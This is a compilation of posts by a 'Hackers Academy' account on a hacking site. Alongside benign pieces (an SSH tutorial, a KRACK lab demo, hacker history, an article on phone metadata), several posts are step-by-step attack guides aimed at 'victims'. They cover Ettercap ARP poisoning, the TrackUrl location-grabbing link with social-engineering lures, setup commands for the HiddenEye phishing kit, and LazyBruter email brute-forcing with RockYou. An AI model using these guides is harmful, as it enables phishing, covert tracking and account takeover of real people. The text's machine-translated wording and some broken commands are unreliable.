Posts made by Hackers Academy

What is SSH?
SSH stands for Secure Shell, a protocol that was invented in 1995 to replace unsafe Telnet (telecommunications network).

The system administrator is now the primary way to securely log on to remote Linux servers over the public Internet.

Although it looks and acts like Telnet, all SSH communications are encrypted to prevent packet capture.

If you are using a Linux or Mac computer, the SSH client is installed by default.

You can open a terminal window and run the ssh command, as shown below, to connect to a remote Linux server.

ssh [email protected]
Now let's discuss how to use SSH on Windows.

Method 1: Built-in SSH Client in Windows 10
The Microsoft PowerShell development team decided to migrate OpenSSH (both client and server) to Windows in 2015.

Finally, it appeared in the Windows 10 Fall Creator Update in 2017 and is by default included in the April 2018 update.

To use the OpenSSH client in Windows 10, simply open a PowerShell window or a command prompt window and run the ssh command.

For example, if I want to connect to my Ubuntu desktop on a local network, I would run.

ssh [email protected]
cryptoparty is the username on my Ubuntu desktop, and 192.168.0.101 is the private IP address of my Ubuntu desktop.

The first time you connect to a Linux computer, you will be asked to accept the host key.

Then enter your login password.

After logging in, you can run Linux commands to perform administrative tasks.

To exit the Linux window, issue the exit command or press Ctrl + D.

To exit the Linux window, issue the exit command or press Ctrl + D.

Method 2: Using SSH in the Windows Subsystem for Linux
The Windows Subsystem for Linux (WSL) allows you to run the built-in Linux command-line tools directly in Windows 10.

If you are a system administrator, WSL is probably redundant just to use SSH, as it will install and run the Linux distribution (without a graphical interface) on the Windows 10 desktop.

WSL is designed for web developers or those who need to work on open source projects.

You can use not only SSH, but also other Linux command line tools (Bash, sed, awk, etc.).

Open the Microsoft Store and enter WSL in the search field. Select “Launch Linux on Windows” and install the Linux distribution of your choice.

For example, I selected Ubuntu and click the Get button to install it.

After installing the Linux distribution, open the control panel and select "Programs" -> "Enable or Disable Windows Features".

Select the Windows Subsystem for Linux check box to enable this feature.

(You may need to restart your Windows computer for the change to take effect.)

After that, you can use the ssh command as shown below to connect to a Linux server or PC running an SSH server.

ssh [email protected]
How to run a .sh file or Shell script in Windows 10

Method 3: use Putty
Putty is the well-known and most popular SSH client on Windows until the advent of the Windows OpenSSH client and the Windows subsystem for Linux.

To use SSH with Putty, you need to download the Putty program from the official website and install it.

Launch Putty from the Start menu. Then enter the IP address or host name of the Linux window and click the “Open” button to connect to this server.

Accept the host key and you will be asked to enter your username and password.
Subscripe https://anonymoushackers.org/user/hackers-academy

Attacks on Wi-Fi. KRACK in practice
In the fall of 2017, the world learned about a new threat to the security of Wi-Fi networks. It affects absolutely all devices and software platforms. No matter how complicated and long the password may be, this will not help, because KRACK is a vulnerability of the WPA2 encryption key exchange protocol itself. In this article, we will understand the theory of a bug and try to test it in practice.

Vulnerability history.
On October 16, 2017, information was disclosed about critical WPA2 problems that circumvent protection and, as a result, listen to Wi-Fi traffic transmitted between the access point and the computer.

The complex of vulnerabilities in WPA2, called KRACK (abbreviation for Key Reinstallation Attacks), was discovered by a joint group of researchers from various universities and companies.

Team leader Mati Vanhof said that he managed to find the problems that make up KRACK back in 2016, but he improved his attack for more than a year. The researcher reported vulnerabilities to some manufacturers and representatives of the US-CERT organization in July 2017, and in August shared information about problems with a wide range of vendors.

Equipment manufacturers hastened to release firmware patches that eliminate vulnerabilities, but, as always happens in such cases, there remains a huge number of non-updated devices.

Operating principle.
The attack is based on the vulnerability of the four-element handshake WPA2. This handshake is performed when the client wants to connect to a secure Wi-Fi network. The process confirms that both parties (client and access point) have the correct credentials. At the same time, the handshake is used to negotiate a fresh encryption key, which will subsequently be used to protect traffic.

An attacker could launch a man in the middle attack and force network participants to reinstall encryption keys that protect WPA2 traffic. In addition, if the network is configured to use WPA-TKIP or GCMP, an attacker can not only listen on WPA2 traffic, but also inject packets into the victim’s data.

By exploiting this critical error, you can decrypt traffic, make HTTP injections, intercept TCP connections, and much more.

The use of HTTPS can protect against KRACK, but by no means always. The fact is that HTTPS itself cannot be called absolutely secure (for example, there are downgrade connection methods), although it will become an additional layer of encryption.

The method is universal and works against any unpatched devices connected to Wi-Fi. The main condition is that the attacker will have to be in the range of the attacked Wi-Fi network, that is, the attack cannot be carried out remotely.

Vulnerabilities included in KRACK.
CVE-2017-13077: reinstallation of the pairwise encryption key (PTK-TK) in the 4-way handshake.
CVE-2017-13078: reinstallation of the group key (GTK) in the 4-way handshake.
CVE-2017-13079: reinstallation of the integrity group key (IGTK) in the 4-way handshake.
CVE-2017-13080: reinstallation of the group key (GTK) in the group key handshake.
CVE-2017-13081: reinstallation of the integrity group key (IGTK) in the group key handshake.
CVE-2017-13082: accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it.
CVE-2017-13084: reinstallation of the STK key in the PeerKey handshake.
CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake.
CVE-2017-13087: reinstallation of the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.
CVE-2017-13088: reinstallation of the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.
Exploitation.
To demonstrate the vulnerability, we need equipment - at least one, or better, several USB Wi-Fi adapters compatible with Kali Linux. My choice fell on the TP-Link N150 Wireless High Gain USB Adapter (TL-WN722N), it has already been tested and is well compatible with my distribution. But you can use any other to your taste.

Why do we even need this “whistle” if the laptop has a Wi-Fi adapter? A separate device for wardriving is recommended not only because it has fewer pickups and it has a stronger antenna, but also for reasons of convenience. With the built-in Wi-Fi adapter, you can simultaneously access the Internet, and this is a pretty important opportunity.

In general, with TP-Link we will raise our fake (or, if you like, test) network and we will perform our experiment in it.

Let's get Wi-Fi up on Kali Linux.
So, download Kali and go to the taskbar (upper right corner of the desktop), raise the Wi-Fi adapter (that is, turn it on) and connect to a pre-prepared network.

We have WPA2-Personal encryption key, and we’ll immediately agree to use a long and strong password. The network to which we will connect is called SKG2.


Install the Krack Attack toolkit.
First, we need to make sure that we have all the necessary dependencies for the Krack Attack toolkit in our system. Run the following command:

sudo apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysf

Since Kali Linux itself does not by default have the tools to play the attack we need, we go to GitHub and download a set of scripts there.

$ git clone https://github.com/vanhoefm/krackattacks-scripts.git

Next, for the purity of the experiment, we need to disable hardware encryption. That is, we will only encrypt the keys with software embedded in Wi-Fi protocols. To do this, go to the directory with Krack Attack:

$ cd krackattacks-script
And there we run the configuration script:

$ sudo ./krackattack/disable-hwcrypto.sh.root

Next, we need to disable Wi-Fi in the Kali network manager, that is, disconnect from the SKG2 network. This will allow you to start your own broadcast in the new WLAN0 network, where we will carry out the attack.

The next step is to create a test Wi-Fi network using TP-Link N150. However, first we need to make sure that our hardware is not blocked. And we will find out using the rfkill utility by typing the following command:

$ sudo rfkill unblock wifi
After the test network is created, we use the krack-test-client.py script. This Python script will check all devices connecting to our Wi-Fi network for the vulnerability of the “Key Reinstall Attack” vulnerability (this is what this method is officially called).

So, create a grid. Compile our modified hostapd instance. If you are not in the know, hostapd is a daemon (service) of a wireless access point in Linux.

$ cd ../hostapd
$ cp defconfig .config
$ make -j 2
Disable hardware encryption for our fake network with the following command (run the same configuration script):

$ cd ../krackattack/
$ sudo ./disable-hwcrypto.sh
In fact, after the script runs, you need to reboot (as the developers of the tool advise). But everything worked for me without reboot. But if something goes wrong, reboot the car.

After rebooting (or without) we execute the command

$ sudo ./krack-test-client.py
This is the same Python script that will allow you to reinstall the keys in a four-way handshake and will automatically create a network. The WPA2-Personal encryption method is used, and the SSID will be testnetwork.

Attack.
Now we take a laptop with Windows 10 and we cling on it to the testnetwork network. We enter our very complex and long password and make sure that the connection has occurred.

After the laptop with Windows 10 ended up in the test network, in the Kali terminal we receive notifications from the krack-test-client.py script, which tries to scan the connected client (our laptop) for vulnerability and, if it finds it, exploit it.

But the result is still sad. Windows 10, of course, has a patch, which the Client DOESN’T line seems vulnerable to pairwise key reinstallation in the 4-way handshake says.

Let's try a few more options specified by the keys to the script.

$ sudo ./krack-test-client.py --group
$ sudo ./krack-test-client.py --tptk
$ sudo ./krack-test-client.py --tptk-rand
But of course, nothing works. Are we really trying so much in vain?

Not in vain! I easily found a vulnerable device - it turned out to be a phone with Android 7.0, which was last updated in July 2018. Such for sure you can still meet.

Connect the smartphone to testnetwork and see what our script tells us. A few seconds of waiting, and he reports that Android is vulnerable to group reinstallation of keys in a four-way handshake.

We have achieved the result! Then you can open, for example, Wireshark and sniff packets. In general, the experiment showed that KRACK is still a very real problem and the attack works.

How to protect yourself?
It turns out that almost every device on almost any Wi-Fi network can be hacked with KRACK. It sounds scary, but - as is the case with any other attack - this is not the end of the world. Here are a few tips to protect yourself from KRACK:

First, always make sure that the browser’s address bar has a green padlock icon. If HTTPS is used, then KRACK will not allow traffic decryption;
secondly, be sure to put the latest security updates.
And of course, for critical sessions, you may not trust a wireless connection at all. Or use a VPN: with it you will have end-to-end encryption between the client and server.

Will KRACK help WPA3?
On June 27, 2018, the Wi-Fi alliance announced the completion of the development of a new security standard - WPA3. This is both a new security protocol and the name of the corresponding certification program.

The creators of WPA3 tried to eliminate the conceptual flaws that surfaced with the advent of KRACK. Since the key vulnerability was hidden in a four-way handshake, WPA3 added mandatory support for a more reliable connection method - SEA, also known as Dragonfly.

Simultaneous Authentication of Equals (SEA) technology has already been used in mesh networks and is described in the IEEE 802.11s standard. It is based on a Diffie-Hellman key exchange protocol using finite cyclic groups.

SEA refers to PAKE type protocols and provides an interactive method whereby two or more parties establish cryptographic keys based on knowing the password by one or more parties. The resulting session key that each party receives to authenticate the connection is selected based on information from the password, keys, and MAC addresses of both parties. If the key of one of the parties is compromised, this will not result in compromise of the session key. And even after learning the password, the attacker will not be able to decrypt the packets.

Another WPA3 innovation will be support for PMF (Protected Management Frames) for monitoring traffic integrity. But in the future, support for PMF will become mandatory for WPA2.

However, the fact that WPA3 is backward compatible with WPA2 has already sparked criticism from Maty Vanhof, the author of the KRACK attack. He is confident that there is a way around PMF to force the client to disconnect from the network.

The introduction of SEA, although it will complicate the conduct of dictionary attacks, will not exclude them and will only make them longer, and to bypass protection in open networks, the attacker will still be able to deploy his access point and intercept traffic.

In addition, WPA3 must be implemented in the device in hardware, and you cannot add support for it with a simple update. Accordingly, implementation will take many years, and information security researchers are not idle.
Subscripe https://anonymoushackers.org/user/hackers-academy

For some, these 10 signs will seem obvious - well, congratulations, it's not so easy to fool you.

Today, the possibility of hacking has become almost as common as breathing, and it is becoming increasingly difficult to understand whether your computer has been hacked or not.

Fraudsters usually try not to leave traces of their actions, and sometimes they are simply almost impossible to notice. Thus, they can come back to you several times to do more harm. But how do you know when you were hacked?

There are many indicators that can tell you that a hacker may have gained access to a computer. There are ten common symptoms that you should pay attention to and respond immediately in case of any deviations.

Anti-virus and / or firewall are turned off
This should be monitored first. The easiest indicator.

Once a hacker weakens the security of your computer, he is more likely to carry out various attacks on you.

At first glance, you won’t even be able to detect that your antivirus has been compromised, as hackers can simply cause a “bug” or “error” and mask its disabling in this way.

If you see that any security software (anti-virus, anti-spam, Windows firewall) behaves strangely - for example, it starts and then disappears, or even does not work, or constantly collapses - this is not just a mistake; this is most likely the first sign of hacking.

This problem can usually be solved by disconnecting from the Internet, restarting the computer in safe mode and launching an offline security scan; the worst case is system recovery.

2. Fake notifications from antivirus

Fake antivirus warnings are the second sure sign that your computer has been hacked. This suggests that it is important to know how your antivirus warnings actually look.

Even worse, this symptom is that by the time you see it, the "damage" from the hacker has already been received by you.

What is going on here? Everything is very simple - hackers release malicious software that uses unused software on your computer to thoroughly exploit your system.

Pressing the “Cancel” or “No” button to stop fake virus scans may not be useful at this point, because most likely you will be asked to buy a new antivirus product. And when you click on this link, you are redirected to a fake site, with a bunch of reviews and other valid scam.

Then guess what? You will be asked to enter your credit information to purchase an “update” of the antivirus ... We don’t think it’s worth explaining further.

What to do?

Force shut down the program (via the task manager), then restart the computer in safe mode, without a network, and try to remove the newly installed software. When this is done, check your computer after rebooting in the standard configuration and make sure that there are no warnings from fake antivirus programs. Drive away all normal antiviruses. Clean your registry as well.

3. Change passwords on the network

If for some reason your password for the website is rejected as incorrect, but you have not changed it and you are sure that you entered it correctly, most likely you were hacked.

When they gain access to your account, hackers can change the password to block you from logging in and even change the email associated with the login, effectively blocking you from the support service.

As a rule, phishing is used for this. How to protect ourselves from him, we wrote earlier.

The hacker collects information for entering the system, changes the password and continues to use the service for his activities, such as identity theft.

Of course, in this case, you need to write to all sapport and urgently change your password, providing all kinds of proofs for owning one or another account.

4. Strange mailings from your mailbox / account in a social network

Do your friends complain that you sent them an unusual letter or a strange message on a social network? There is a possibility that your machine sends malicious emails as a result of hacking or that your email account was also hacked.

Of course, all that is sent is either spam or phishing links.

What to do?

Everything is simple. We remove all unwanted and strange software from our computer. We use antivirus, various cleaners and more. MEANS CHANGING THE PASSWORD THERE, WHERE THE NEWSLETTER IS GOING FROM.

5. Detecting programs that you did not install

It’s more complicated here. The fact is that none of us reads a license agreement, from which it is clear whether it is fake or not, whether there are any additional programs during installation, etc. The second - we stupidly forget to remove the checkmarks from the installation.

Amigo and Yandex Bar infuriate you too? We wrote how to remove this [censored] forever from your computer here.

You can also use search engines to determine if the mouth again
Subscripe https://anonymoushackers.org/user/hackers-academy

Ettercap is an application for analyzing network traffic passing through a computer interface, but with additional functionality. The utility allows you to perform attacks such as "man in the middle" to force another computer to transfer packets not to the router, but to you.

Wireshark is a fairly well-known tool for capturing and analyzing network traffic, in fact the standard for both education and Troubleshoot. Wireshark works with the vast majority of known protocols, has a clear and logical graphical interface based on GTK + and a powerful filter system.

The “Man In The Middle” attack is a type of attack when an attacker intercepts and spoofs messages exchanged between correspondents, and none of the latter guesses about his presence in the channel.
First you need to connect to a wireless network. Then run the ettercap application. It has a UI interface.

We need to determine which ip devices are connected to the same network as us. To do this, go to the section Sniff -> unified sniffing
In this section, you need to select the type of network that we want to track. In our case, it is a wireless network.
After that, additional options will be displayed. Next, select the Hosts -> Scan for hosts section. After the scan is completed, you need to go to the list section of all the hosts that we found in the scanning phase, for this we enter the section Hosts -> Hosts list.
In this option we select:

1. ip addresses we want to track
2. add monitoring for them using the Add to Target 1 and Add to Target 2 buttons
   Then we go to the Mitm -> ARP poisoning section and check the sniff remote connections function, and in the end we press the start of tracking through the Start button.
   Next, run the Wireshark program.

Subscripe https://anonymoushackers.org/user/hackers-academy

The Ministry of Internal Affairs, together with the Federal Financial Monitoring Service, the General Prosecutor's Office, the Investigative Committee, the Ministry of Justice, the FSB, the Federal Customs Service and the Federal Security Service, with the participation of the Supreme Court, must prepare the legal mechanism for the seizure of cryptocurrency by December 31, 2021. The information that such a measure is being discussed along with other proposals to combat IT crimes was confirmed by a representative of Group-IB, a company that specializes in combating cyber crimes.

The trend of a constant increase in the number of crimes using virtual assets, the insecurity of individuals from this type of criminal encroachment, of course, dictate the need to develop mechanisms for legal regulation and control over the circulation of virtual assets. Hackers who hack into users' computers and systems of large companies often require them to be paid in cryptocurrency (companies in Russia and other countries faced the demand for ransom in bitcoins).

From a technical point of view, enforcing a cryptocurrency is a rather complicated process, because if the person whose cryptocurrency is being enforced does not reveal the private key from his wallet, then it will be impossible to obtain it. But you can forget the private key, lose the piece on which it is written, and so on. It is very interesting how this problem will be solved by law enforcement agencies.

However, if the cryptocurrency is stored on a cryptocurrency exchange, law enforcement authorities can theoretically write an official request to it with a request to block the funds of a particular client (all clients of the cryptocurrency exchange are identified) or, for example, transfer them to a special account.

Experts believe that the legal mechanism for the seizure of cryptocurrency from the Ministry of Internal Affairs will not affect the digital money market, as well as its value. Experts advised not to worry and not to sell their assets because of this, because at the moment the initiative of the security forces is being considered in the long term, and even if adopted, it will concern only those citizens who have violated the law.

The hacker was able to install Windows 10 on the calculator. He is the same hacker who installed the full version of Windows 10 on Windows Phone and OnePlus 6.

The hacker, who is known as @imbusho on Twitter, was able to successfully install Windows 10 IoT Core on HP's primary graphics calculator, and not on the basic or scientific calculator with the plus, multiplication, and division that we usually use.

For those who don’t know, Windows 10 IoT is a family of operating systems from Microsoft designed for use in embedded devices such as a washing machine, automatic door lock, Rasberry Pi, Glas Thermostat and many others.

According to the hacker, the first attempt to boot the operating system failed with some pre-OS error. As a result, Windows 10 is still not working properly.

Although Windows 10 IoT Core does not provide full interaction with Windows Shell, it can potentially run universal applications (UWP) in the background.

Individuum publishes a book by Meduza special correspondent Daniil Turovsky, Invasion. A brief history of Russian hackers. " The book tells about a generation of teenagers from the countries of the former USSR who in the 1990s faced the Internet and for whom the Network became a window into a big world - full of opportunities and much more interesting than the gloomy world of post-Soviet cities. Turovsky describes how from an early subculture of hackers, for whom hacking was a bit of a hobby, new ones arose - for which hacking became an opportunity to earn big money. At the same time, this is the history of the emergence of Russian cyber-military forces - a new generation of hackers who have appeared in the service of the state. Medusa publishes the head of The KGB Bear - it tells how teenagers from East Germany hacked American networks and sold USSR data - where, apparently, they simply did not understand what opportunities hackers could provide.

On June 3, 1989, a burned body of an unknown man was found in a forest near Hanover in Germany. It lay near an abandoned and dusty car that looked as if it had stood in this forest for several years; nearby lay an empty gas canister. There were no shoes on the man - she was never found afterwards.

Soon, police reported that the deceased was a 24-year-old resident of Hanover, Karl Koch. Koch’s boss reported that he had disappeared when his subordinate did not return to work after lunch. The police considered death a suicide - and it would hardly have attracted the attention of journalists if it were not for the fact that Koch was a defendant in a high-profile trial. He was suspected of working for the KGB.

Koch was a member of a hacker group that has cracked the U.S. Department of Defense, NASA, and other U.S. agencies for years. They downloaded documents from hacked computers, and they and their access to systems were sold to KGB officers in East Berlin for money and drugs.

When Koch was in school, he read the book trilogy “The Illuminatus!” - in it a fascinating fantastic plot was tied to conspiracy theories about a world conspiracy. After becoming a computer scientist, he took the nickname Captain Hubard in honor of one of the heroes of these novels. Koch was convinced that computer networks are also a trap for the Illuminati who secretly rule the world, and aliens are watching him, like Khabard.

Both Koch and his friends became the first generation to start using both the first personal computers and the Internet, which was already beginning to resemble the current one. In the early 1980s, computers began to be used not only for military or programmatic needs, but simply at home: for example, for study, maintaining a family budget and, of course, video games like Space Invaders or Arkanoid. In 1981, IBM released the first PC; Apple released the first Macintosh. There were also cheaper computers like the ZX Spectrum, on which you could just start programming. In the same years, the TCP / IP data exchange protocol and the DNS domain distribution system and the WWW distributed system were all components of the current Internet.

Then not only the first hackers, but also associations began to appear. In 1981, in Germany, some of them joined together in the Chaos Computer Club - its members were going to change society with the help of new digital technologies.

At some point, Koch began to talk a lot with people from the Chaos Computer Club. He told one of his new acquaintances that he had come up with this method of suicide: to build an atomic bomb, climb one of the towers of the World Trade Center in New York and explode.

In those same years, in the mid-1980s, Koch composed a manifesto in which he predicted that information wars would begin in the near future using “soft bombs” - computer viruses. At parties, he often told strangers that he was the most serious and talented hacker of our time.

Soon, Koch met Pengo, a teenager who had been a fan of William Gibson’s cyberpunk novel, The Neuromancer, whose hero steals information from computer networks. In 1984, the sixteen-year-old Pengo stopped paying attention to studying and his friends, quit his job in the video games salon and began to spend all his time with his computer and modem.

In the last years of the Cold War, many foresaw the imminent changes, but formally the United States and NATO countries remained enemies of the USSR. In 1986, Koch, Pengo and their friends thought about making money from hacks - and decided to do computer spying for the countries of the Eastern Bloc. They called their group Equalizer, bearing in mind that by selling military and scientific information to the Soviet authorities, they equalize the chances of their confrontation with Western countries, which means they strengthen world peace.

In September 1986, one of the members of the group, Peter Karl, arrived in the building of the Soviet Embassy on Unter den Linden Street in East Berlin. At the entrance, he told the security guard that he would like to talk about one case with someone from the KGB. The guard offered to wait, after half an hour a mu went out to the hacker

Hackers transferred to the KGB access to the Pentagon and NASA databases, the Los Alamos nuclear laboratory, as well as materials about the space and nuclear infrastructure of West Germany, France, Japan, and Great Britain. Among other things, the group hacked into the systems of the CERN nuclear research center in Geneva. For the transfer of KGB data, they received several hundred thousand dollars.

In 1988, US intelligence agencies, together with programmer Clifford Stoll, who was the first to notice a penetration into the computer system of the American University library in which he worked, discovered that hackers had access to 30 computers in the military. They went on the trail of crackers, and soon the special services of Germany detained hackers in several German cities. They were not placed under arrest for the duration of the trial.

Despite the mysterious death of Koch, the trial passed quietly. The main witness was one of the members of the group - Pengo. He gave detailed evidence and made a deal with the investigation. The teenager was amnestied, other hackers received suspended sentences and fines. Considering the case, the judge noted that the Soviet intelligence services, apparently, simply did not understand what opportunities the hackers could provide them. Nevertheless, the German television channel ARD rated the actions of hackers as the most serious case of espionage since 1974, when it was discovered that the assistant chancellor of Germany was an East German spy.

Koch's acquaintances did not consider his death to be suicide: some were surprised that the grass around the body burned in a neat circle; for others, the hacker generally drove a gas canister into the woods 70 kilometers from home, rather than committing suicide in a simpler way.

Over time, the story of Koch turned into a kind of hacker legend - in forums he is sometimes called the “great warrior”. The story of a German group in the early 1990s was told by John Markoff in his book Cyberpunk. It was one of the few books about hackers that was translated into Russian and distributed on the Internet in the middle to the end of that decade. Any cyber-underground worker of that time, who was thinking about cooperation with the state, probably knew this story.
Subscripe https://anonymoushackers.org/user/hackers-academy

Welcome all.

In this article I would like to talk about how to open corrupted archives

Ways:
Using the online service "Unzip-Online"
Installing Passper for ZIP
Unzip-Online.
The first method to obtain passwordless access to encoded archives is to go to the Unzip-Online.com website. This online tool for unpacking archive data supports the formats “.zip”, “.rar”, “.7z” and “.tar”, but the size of attached objects cannot exceed 200 MB. Next, step-by-step instructions will be given for working with the Unzip-Online.com online platform under consideration.
Step 1: Open your browser, go to Unzip-Online.com and click on the “Uncompress files” button

Step 2: Click “Browse ...” and download the password-protected archive file from which you want to remove restrictions

Step 3: After downloading the archive, click “Uncompress file”, after which after a while, depending on the speed of the Internet connection, a link will appear for downloading the unlocked archive.

Passper for ZIP.
The second method, which in our opinion is the most preferable, is to use the functionality of the Passper for Zip program. This software is a very powerful software tool that can decrypt archive files in a few seconds using four exclusive key phrase selection algorithms.

Download for free

Step 1: Download and install “Passper for Zip” from the official website of the developers, following the recommendations of the installation wizard

Step 2: Add the encrypted ZIP file from your computer by clicking the “+” icon in the main menu of the application

Step 3: Now you should choose one of four decryption algorithms, among which:

“Combination Attack”, which allows you to select a passphrase by rearranging various combinations of certain letters and characters that must be exactly present in the password
Mask Attack is used if the user remembers fragments or special characters from the keyword, which makes it possible to unlock the archive very quickly
Dictionary Attack selects keys based on user or shared dictionaries
Brute Force Attack will sort through all possible combinations of letters and symbols, but such a method can take a very long time, depending on the complexity of the key phrase.

Step 4: At this stage, it remains to click “Next” to start the decryption process, after which a working password will be displayed, which must be copied and pasted when opening a locked archive.

If it was useful to someone, subscripe this channel) I tried)
Subscripe https://anonymoushackers.org/user/hackers-academy

As usual, open our Linux terminal and copy these lines:
git clone https://github.com/cryptomarauder/TrackUrl
cd TrackUrl
./TrackUrl.sh
It should look something like this:

Hit Enter and two windows appear:

In a small window in the Forwarding line you can find NGROK links, one for http, the other for general https.
! WRITE OFF HANDLES FOR HTTPS!
This is our reference for the victim. We enter it into a large console, where the third window will open.

Following the link, we (the victim) will get to this site:

Many telephones and computers determine the location by default, that is, in 70 percent of cases, you will be able to find out the location of the victim. In the meanwhile, logs are piling into the console.
Thus, we established and recognized the location of our victim.
SI METHODS
In order to persuade a person to go to the link you need to naturally know the person, his preferences and so on.
For example, we can say that there is a portal, Z Hacker, this is the most interesting forum of information security.
Or, you can say that I found a forum on which a bunch of interesting horror stories, and you throw a link to the victim. The skeleton in the picture fits perfectly
Your smd
TrackUrl training video from overbafer1
Subscripe https://anonymoushackers.org/user/hackers-academy

! DISCLAIMER! - DO NOT USE FOR ILLEGAL PURPOSES ONLY IF THE LAW PERMITS!
Hello!
In this post I would like to show you an interesting utility, one of the best of its kind - Hidden Eye
In short: Hidden Eye is a Python utility, a Linux repository that allows you to carry out phishing attacks on more than 37 resources, including (! ON SECOND TIME!) PornHub.
We can say that phishing has reached a new level: 4741:
The program has been tested on these operating systems:
Kali Linux - Rolling Edition
Parrot OS - Rolling Edition
Linux Mint - 18.3 Sylvia
Ubuntu - 04.16.3 LTS
Macos high sierra
Arch linux
Manjaro XFCE Edition 17.1.12
Black arch
Userland app (For Android Users)
I assume that this program can also be run on Termux on Andriod
That's enough water, let's get started.

Open the Kali Linux terminal, and write the lines below:

git clone https://github.com/DarkSecDevelopers/HiddenEye.git - The utility will be cloned to the Home folder
chmod 777 HiddenEye - "Chmod" the downloaded repository (this is what I call the chmod command)
sudo apt install python3-pip - Use the sudo command to download pip
cd HiddenEye - Go to the folder of our repository
sudo pip3 install -r requirements.txt - Install requirements.txt with pip
./HiddenEye.py - Run the file (If it didn’t work, then run the command below)
python3 HiddenEye.py

The program is intuitive, and it’s not difficult to figure it out.
Advice:
Use NGROK, it is better for me than SERVEO.NET, however both methods work
Specify port 3333 when the program asks for port. I always use only it.
Good luck to all!
Subscripe https://anonymoushackers.org/user/hackers-academy

Hello!
We all know what brutus is. And for those who don’t know: BruteForce is the selection of passwords by sorting through random characters or sorting passwords in the list indicated by the hacker.
No one is protected from brutus. The only possibility: a very complex password, usually more than 8 characters, with capital letters, etc.
But sooner or later, your password will also become weak and vulnerable.
What you will see has not yet been on the Russian Internet. Become the first Russian user of LazyBruter.
Yes. Today we will talk about the best of its kind repositories for brutus. LazyBruter.
To run our utility, copy these lines to our terminal:

git clone https://github.com/TheBrowserPirates/lazybruter.git
cd lazybruter
chmod + x lazybruter.py
python3 lazybruter.py

Here is a window like this:

I would advise allowing proxy, write to

Here you can choose two options
and - just brute force passwords
b - brute force passwords from a text document.
If a:

We choose the minimum password size, and agree if the mail is the mail of our victim

Passwords are being searched and it will take a lot of time. We make tea and wait for breaking.
Interesting - the program iterates over these characters: abcdefghijklmnopqrstuvwxyz1234567890! # $% & '* + - / =? ^ _ {|} ~; `

If you have chosen option b:
We indicate the path to our list of passwords (I advise you to download RockYou.txt on the Internet - there are 14 Million PASSWORDS), the document should be in the lazybruter folder for more convenience. Hit Enter
If ALL passwords in the list are incorrect, then this window will pop up:

If one of the passwords on your list approached the victim's mail, the program will give an answer in 1 second.

LazyBruter is one of the best email broilers, and also the fastest (I ran it on a computer of 10 years of age and it worked flawlessly)

The list of characters for brutus can be changed as you like. This is useful if for example you know the first few characters of the victim’s password.

Subscripe https://anonymoushackers.org/user/hackers-academy

The content of the article
All-seeing eye
Not just CDR
Disposable Phones
Case 1
Case 2
Case 3
If there are a lot of anonymous devices
Telephone terrorism: what if the call was really one?
And if you make calls via VoIP using a VPN?
How is the analysis
Somehow it's all ... unreliable!
Conclusion
Imagine this situation: an unknown person calls from a disposable telephone and demands a ransom for the person stolen by him. The next day, the offender calls again. The victim contacts the police, and after half an hour they will find out not only the real number of the caller, but also the entire history of his movements and calls. And all this without complex equipment, fake base stations and signal interception.

All-seeing eye
We regularly write about vulnerabilities of smartphones, data networks and the security of cloud services. We are so used to “thinking hard” that we completely forget about the existence of much simpler and more effective methods available to the police of different countries.

Often the police will not even try to hack or intercept something, but simply make a request to the mobile operator, and the latter will give not only the call history, but also a lot of other interesting information. As an example: an article about an Australian journalist, which analyzes the information collected about the journalist by his mobile operator over the past two years (and only she).

According to Australian laws, mobile operators are required to store certain information about network users, the Call detail record database for two years. This includes information about the location of the device at any time (by the way, a precedent has recently been created in Sweden: this information alone is not enough to pronounce a sentence), a call log, including information about another subscriber, and data about Internet access sessions. As for SMS, according to the Australian law on protection of privacy, without prior authorization to listen, the operator has the right (and is obliged) to save only metadata: time of sending, message size and addressee. The content of the messages themselves (and especially voice calls) is not saved.

This is the information gathered by the operator about the journalist.

Places visited by the journalist on April 1, 2015
.

Places that he most often visited during a given time period.

Interactive versions of this data are available via the link.

Metadata includes information about who the user called and wrote messages about, the duration of calls, and which base stations the telephone was connected to at what point in time (this information allows you to accurately determine the location of the device). In some countries (we will not point the finger, but this is the United States), operators not only provide information about the location of the police user, but also with pleasure trade in such data.

The most interesting thing is that mobile operators are available (and issued to the police, as well as sold to anyone) details about the use of the Internet, including website addresses and the amount of data transmitted. This is a completely separate topic for discussion; data is collected by tracking requests to the provider's DNS servers. With this data, operators are also happy to bargain; the feeder is so attractive that operators even tried to block clients from using third-party DNS servers.

US mobile operators are also required to keep CDR records. In addition, in the United States, special services maintain a single MAINWAY database, records in which can be stored for much longer than legally permitted by mobile operators.

In Russia, the so-called Spring Law has been adopted, which obliges mobile operators to store metadata for three years (their list almost completely coincides with the Australian version of the law). In addition, since October last year, operators are required to store for at least 30 days (but not more than six months) text, voice, video and other user messages. Accordingly, in Russia, any call must be recorded by the operator and provided to the police according to legal requirements.

Not just CDR
In the above study, journalist Will Oakenden used an iPhone. A correctly executed request to Apple (in the terminology of the company - Device Request, that is, a request in which the police have nothing but a hardware device identifier - IMEI) will allow the police to receive the data that Apple collects about the user, and it includes almost everything with rare exceptions. Here, for example, looks statistics of requests to Apple in Russia.

For comparison, in the United States over the same year, the police requested information on 19,318 devices (81% of requests were successful). Google offers an interactive schedule, which can be found here.

And if Apple does not provide the police with data such as user passwords, device usage statistics, SMS / iMessage messages and “Health” data (a history of the user's physical activity, including the number of steps and heart rate in a given time interval, is a useful thing for catching as criminals spouses), then Google will give everything, including passwords (to be completely technically correct, I will add that backup encryption has appeared in Android 9; accordingly, the police will not receive any backups or store their SMS and call logs).

Disposable Phones
Criminals who use their primary telephone for threatening calls, extortion, and other criminal offenses are now almost gone; above, we figured out why in detail. What remains to the criminal? Disposable SIM cards (perhaps we will not discuss the ways criminals acquire such cards now) and disposable (usually cheap push-button) devices, preferably completely devoid of Internet access.

In order to get at least some information about the suspect, the police need at least one clue - IMEI is enough. But what can be determined by the identifier of the device, which turned on for just a few minutes? Read conspiracy theories (a perfect example), novice criminals anxiously take out the battery from the phone, including the device, just to make a call.

Of course, none of them even thinks about what happens when the device turns on and off (both standard and emergency, with the battery removed). Moreover, few people think about whether operational police officers are aware of such a pattern.

